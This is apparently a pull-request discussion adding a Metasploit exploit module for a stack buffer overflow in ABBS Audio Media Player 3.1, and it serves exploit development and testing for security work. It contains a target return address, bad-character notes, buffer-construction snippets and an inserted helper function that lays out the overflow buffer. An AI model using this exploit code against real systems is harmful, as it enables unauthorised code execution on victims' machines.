Added abbs amp exploit module #2038
Conversation
    [
      [ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
        {
          'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
Is "\x00" a badchar that can be used in the ret? I have not done badchar analysis myself, just asking because it sounds strange.
Ah yes, I forgot to remove the \x00 bad char. It doesn't affect the stack after all.
After a bit of research, we still need the \x00 to be in the badChars list to make the exploit work. Please see my latest commit 478beee
On the other hand, tried on Windows XP SP3 / ABBS Audio Media Player 3.1 and it worked; comments should be discussed / fixed before we're able to land!:
    buffer = payload.encoded
    buffer << rand_text(target['Offset'] - (payload.encoded.length))
    buffer << [target.ret].pack('V')
    buffer << rand_text_alpha_upper(800)
Where did the 800 suffix padding length come from? And why is it not dependent on the length of anything else in the buffer?
The 800 chars of padding were added to fill the buffer and trigger the overflow. Is there any nicer way to fill the buffer?
Well, that would be clearer if you had a constant like OVERFLOW_LENGTH that then calculated the fill length by doing

    overflow_fill = OVERFLOW_LENGTH - buffer.length
    buffer << rand_text_alpha_upper(overflow_fill)

That way the overflow will always be correct if the encoded payload were shorter than expected for some reason. It would also let you experiment to see what is the shortest length you can use to trigger the overflow so you can send a smaller exploit.
Ah yes, ok I'll experiment with the buffer length and try to include your suggestion. Thanks! 👍
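To make the reviewer's point concrete, here is an added example (not code from the pull request or from Metasploit) of building the same layout from a single total-length constant and checking the arithmetic, so the return address still lands at the offset when the encoded payload is shorter than expected and a payload that would overrun the offset is rejected instead of silently corrupting the layout. The function name `build_overflow_buffer`, the constant `TOTAL_LENGTH`, the fixed 'A'/'B' filler in place of `rand_text`, and the sample values in the usage are assumptions made for this illustration.

```ruby
# Added example: layout [payload][filler to Offset][ret][filler to TOTAL_LENGTH],
# sized from one constant as suggested in review. Not the module's own code.
TOTAL_LENGTH = 2000 # constructed sample value; stands in for OVERFLOW_LENGTH

# Returns a binary string of exactly total_length bytes, or raises when the
# requested layout is impossible (payload longer than the offset, or a total
# too small to hold offset + 4-byte return address).
def build_overflow_buffer(payload, offset, ret, total_length = TOTAL_LENGTH)
  if payload.bytesize > offset
    raise ArgumentError, "payload (#{payload.bytesize} bytes) exceeds offset (#{offset})"
  end
  if total_length < offset + 4
    raise ArgumentError, "total length #{total_length} cannot hold offset + ret"
  end

  buffer = payload.b                          # work in raw bytes
  buffer << ('A' * (offset - payload.bytesize)) # filler up to the saved return address
  buffer << [ret].pack('V')                   # little-endian 32-bit return address
  buffer << ('B' * (total_length - buffer.bytesize)) # filler computed, not hard-coded
  buffer
end

# Reads back the 32-bit little-endian value at the given offset (sanity check).
def ret_at_offset(buffer, offset)
  buffer.byteslice(offset, 4).unpack1('V')
end

if __FILE__ == $0
  buf = build_overflow_buffer("\x90" * 100, 1000, 0x00412c91, 2000)
  puts "length=#{buf.bytesize} ret=0x#{ret_at_offset(buf, 1000).to_s(16)}"
end
```

Because the trailing filler is derived from `total_length - buffer.bytesize`, shrinking or growing the encoded payload never changes the total size or the position of the return address, which is exactly what the fixed 800-byte suffix in the original snippet could not guarantee.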
    buffer = payload.encoded
    buffer << rand_text(target['Offset'] - (payload.encoded.length))
    buffer << [target.ret].pack('V')
    buffer << rand_text(target['Max'] - buffer.length)
And is it really needed? Sorry, but it doesn't look like a "standard" stack-based buffer overflow, so I'd really like to know if it's needed at all to get EIP control?
Based on my last research, the module doesn't reach EIP if there's no additional buffer. But you're right, I rebooted the box and it works now. The last junk is not needed, as you said.
Okay, testing again and landing if working! Thanks @modpr0be !
Working:
merging.
This pull request adds an exploit module for the ABBS Audio Media Player exploit posted on exploit-db with EDB-ID 25204.